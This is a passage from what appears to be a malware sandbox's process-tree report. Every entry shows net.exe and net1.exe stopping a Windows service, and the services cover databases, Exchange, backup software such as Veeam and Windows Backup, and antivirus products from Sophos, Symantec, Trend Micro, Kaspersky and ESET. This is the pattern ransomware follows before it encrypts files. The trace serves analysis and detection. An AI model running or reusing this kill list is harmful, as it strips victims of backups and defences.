    C:\Windows\system32\net1 stop MSExchangeSA /y
    3⤵
    PID:3412
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeSRS /y
  2⤵
  PID:3336
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSRS /y
    3⤵
    PID:4024
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSOLAP$SQL_2008 /y
  2⤵
  PID:3716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
    3⤵
    PID:3988
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:3464
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:3964
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSOLAP$TPS /y
  2⤵
  PID:3972
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPS /y
    3⤵
    PID:3556
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSOLAP$TPSAMA /y
  2⤵
  PID:3364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
    3⤵
    PID:3880
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$BKUPEXEC /y
  2⤵
  PID:4032
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
    3⤵
    PID:4004
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$ECWDB2 /y
  2⤵
  PID:4000
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
    3⤵
    PID:4012
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:4016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:3964
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:3704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:1548
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:4008
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:3876
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SBSMONITORING /y
  2⤵
  PID:3248
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
    3⤵
    PID:4004
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SHAREPOINT /y
  2⤵
  PID:3444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
    3⤵
    PID:3472
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SQL_2008 /y
  2⤵
  PID:3952
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
    3⤵
    PID:3944
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:4052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:3520
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$TPS /y
  2⤵
  PID:4012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPS /y
    3⤵
    PID:3896
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$TPSAMA /y
  2⤵
  PID:3336
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
    3⤵
    PID:4040
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:3964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:3936
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:3832
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:1528
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher /y
  2⤵
  PID:4008
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher /y
    3⤵
    PID:4052
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:3724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:3480
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:4036
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:3716
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:3912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:4040
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:3364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:3248
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:3972
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:4024
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:3280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:3996
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:3964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:3472
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLSERVER /y
  2⤵
  PID:3880
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLSERVER /y
    3⤵
    PID:3912
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLServerADHelper100 /y
  2⤵
  PID:3868
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
    3⤵
    PID:3936
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLServerOLAPService /y
  2⤵
  PID:3724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
    3⤵
    PID:3052
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MySQL80 /y
  2⤵
  PID:3536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MySQL80 /y
    3⤵
    PID:3872
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MySQL57 /y
  2⤵
  PID:3864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MySQL57 /y
    3⤵
    PID:3716
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ntrtscan /y
  2⤵
  PID:4012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ntrtscan /y
    3⤵
    PID:3912
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop OracleClientCache80 /y
  2⤵
  PID:3444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop OracleClientCache80 /y
    3⤵
    PID:3892
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop PDVFSService /y
  2⤵
  PID:3996
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:3936
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop POP3Svc /y
  2⤵
  PID:3964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop POP3Svc /y
    3⤵
    PID:3968
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ReportServer /y
  2⤵
  PID:4052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer /y
    3⤵
    PID:3336
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:3704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
    3⤵
    PID:3556
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:4032
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:3928
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ReportServer$TPS /y
  2⤵
  PID:3872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPS /y
    3⤵
    PID:3940
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ReportServer$TPSAMA /y
  2⤵
  PID:3980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
    3⤵
    PID:3416
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop RESvc /y
  2⤵
  PID:3892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RESvc /y
    3⤵
    PID:3472
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop sacsvr /y
  2⤵
  PID:3592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sacsvr /y
    3⤵
    PID:3876
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SamSs /y
  2⤵
  PID:3052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SamSs /y
    3⤵
    PID:4056
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SAVAdminService /y
  2⤵
  PID:1528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVAdminService /y
    3⤵
    PID:3940
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SAVService /y
  2⤵
  PID:3652
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVService /y
    3⤵
    PID:4000
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SDRSVC /y
  2⤵
  PID:3556
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SDRSVC /y
    3⤵
    PID:3536
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SepMasterService /y
  2⤵
  PID:4020
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SepMasterService /y
    3⤵
    PID:3444
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ShMonitor /y
  2⤵
  PID:3832
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ShMonitor /y
    3⤵
    PID:3928
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop Smcinst /y
  2⤵
  PID:3416
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Smcinst /y
    3⤵
    PID:4024
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SmcService /y
  2⤵
  PID:3936
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SmcService /y
    3⤵
    PID:4048
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SMTPSvc /y
  2⤵
  PID:3280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SMTPSvc /y
    3⤵
    PID:3988
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SNAC /y
  2⤵
  PID:4056
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SNAC /y
    3⤵
    PID:3928
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SntpService /y
  2⤵
  PID:4004
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SntpService /y
    3⤵
    PID:3880
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop sophossps /y
  2⤵
  PID:3616
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophossps /y
    3⤵
    PID:3636
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:3536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:4048
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$ECWDB2 /y
  2⤵
  PID:3444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
    3⤵
    PID:3464
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:3520
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:3280
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:1548
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:4008
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:3336
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:3464
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:1528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:3716
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:3480
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:3936
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SQL_2008 /y
  2⤵
  PID:3536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
    3⤵
    PID:3880
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:3052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:3964
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$TPS /y
  2⤵
  PID:3864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPS /y
    3⤵
    PID:3464
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$TPSAMA /y
  2⤵
  PID:3364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
    3⤵
    PID:3636
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:3952
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:3912
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:4032
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:3880
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLBrowser /y
  2⤵
  PID:3984
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLBrowser /y
    3⤵
    PID:3936
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLSafeOLRService /y
  2⤵
  PID:3876
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSafeOLRService /y
    3⤵
    PID:4024
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLSERVERAGENT /y
  2⤵
  PID:3052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSERVERAGENT /y
    3⤵
    PID:3556
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLTELEMETRY /y
  2⤵
  PID:3996
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY /y
    3⤵
    PID:3416
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:3592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:3832
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLWriter /y
  2⤵
  PID:3912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLWriter /y
    3⤵
    PID:3984
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SstpSvc /y
  2⤵
  PID:3568
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SstpSvc /y
    3⤵
    PID:3616
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop svcGenericHost /y
  2⤵
  PID:4012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop svcGenericHost /y
    3⤵
    PID:3928
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop swi_filter /y
  2⤵
  PID:3364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_filter /y
    3⤵
    PID:3464
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop swi_service /y
  2⤵
  PID:3520
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_service /y
    3⤵
    PID:3444
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop swi_update_64 /y
  2⤵
  PID:3280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_update_64 /y
    3⤵
    PID:3616
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop TmCCSF /y
  2⤵
  PID:3416
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TmCCSF /y
    3⤵
    PID:3336
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop tmlisten /y
  2⤵
  PID:3636
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop tmlisten /y
    3⤵
    PID:3832
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop TrueKey /y
  2⤵
  PID:1528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKey /y
    3⤵
    PID:3364
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop TrueKeyScheduler /y
  2⤵
  PID:3864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyScheduler /y
    3⤵
    PID:3980
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop TrueKeyServiceHelper /y
  2⤵
  PID:4004
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
    3⤵
    PID:3444
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop UI0Detect /y
  2⤵
  PID:3412
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop UI0Detect /y
    3⤵
    PID:4020
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamBackupSvc /y
  2⤵
  PID:3280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBackupSvc /y
    3⤵
    PID:4008
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamBrokerSvc /y
  2⤵
  PID:4024
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBrokerSvc /y
    3⤵
    PID:3988
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamCatalogSvc /y
  2⤵
  PID:3336
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCatalogSvc /y
    3⤵
    PID:3716
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamCloudSvc /y
  2⤵
  PID:3936
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCloudSvc /y
    3⤵
    PID:3724
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:1528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:3980
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamDeploySvc /y
  2⤵
  PID:3864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploySvc /y
    3⤵
    PID:3536
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:3480
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:4000
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamMountSvc /y
  2⤵
  PID:3616
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamMountSvc /y
    3⤵
    PID:3928
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:3964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:3364
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamRESTSvc /y
  2⤵
  PID:3568
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamRESTSvc /y
    3⤵
    PID:3912
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:3992
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:3880
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop W3Svc /y
  2⤵
  PID:3480
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop W3Svc /y
    3⤵
    PID:3984
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop wbengine /y
  2⤵
  PID:3892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:3712
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop WRSVC /y
  2⤵
  PID:3996
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop WRSVC /y
    3⤵
    PID:3568
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:1528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:3280
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:3872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:3412
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamHvIntegrationSvc /y
  2⤵
  PID:4008
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
    3⤵
    PID:3536
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop swi_update /y
  2⤵
  PID:3880
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_update /y
    3⤵
    PID:3920
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$CXDB /y
  2⤵
  PID:3724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CXDB /y
    3⤵
    PID:3984
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:1548
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:3444
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "SQL Backups" /y
  2⤵
  PID:3472
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SQL Backups" /y
    3⤵
    PID:4004
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$PROD /y
  2⤵
  PID:3364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROD /y
    3⤵
    PID:4048
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Zoolz 2 Service" /y
  2⤵
  PID:3972
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Zoolz 2 Service" /y
    3⤵
    PID:3964
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLServerADHelper /y
  2⤵
  PID:3716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper /y
    3⤵
    PID:3880
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$PROD /y
  2⤵
  PID:4056
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROD /y
    3⤵
    PID:1548
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop msftesql$PROD /y
  2⤵
  PID:3872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msftesql$PROD /y
    3⤵
    PID:3964
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop NetMsmqActivator /y
  2⤵
  PID:3876
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetMsmqActivator /y
    3⤵
    PID:3556
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop EhttpSrv /y
  2⤵
  PID:3472
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EhttpSrv /y
    3⤵
    PID:3568
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ekrn /y
  2⤵
  PID:3464
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ekrn /y
    3⤵
    PID:4048
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ESHASRV /y
  2⤵
  PID:3832
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ESHASRV /y
    3⤵
    PID:4008
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SOPHOS /y
  2⤵
  PID:3416
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
    3⤵
    PID:3876
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SOPHOS /y
  2⤵
  PID:3896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
    3⤵
    PID:4012
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop AVP /y
  2⤵
  PID:3592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AVP /y
    3⤵
    PID:4048
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop klnagent /y
  2⤵
  PID:3972
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop klnagent /y
    3⤵
    PID:3992
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:3940
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:4004
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:3280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:3556
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop wbengine /y
  2⤵
  PID:3364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:3912
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop kavfsslp /y
  2⤵
  PID:3724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop kavfsslp /y
    3⤵
    PID:3992
